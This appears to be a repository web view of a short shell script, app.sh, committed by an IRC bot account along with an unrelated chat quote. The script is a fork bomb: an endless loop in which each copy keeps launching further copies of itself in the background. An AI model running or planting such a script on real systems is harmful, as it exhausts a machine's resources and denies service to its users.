view app.sh @ 4537:1b77af03d50f

<kmc> addquote <Sgeo> It is not lemonparty nor screamer nor 2048. I am not sure what pentagon papers is, but it\'s not that either
author HackBot
date Tue, 01 Apr 2014 07:31:13 +0000
parents 7f957c1f4661
children
line wrap: on
line source

#!/bin/sh
while [ 1 = 1 ] ; do
echo x
nohup ./app.sh &
sleep 1
done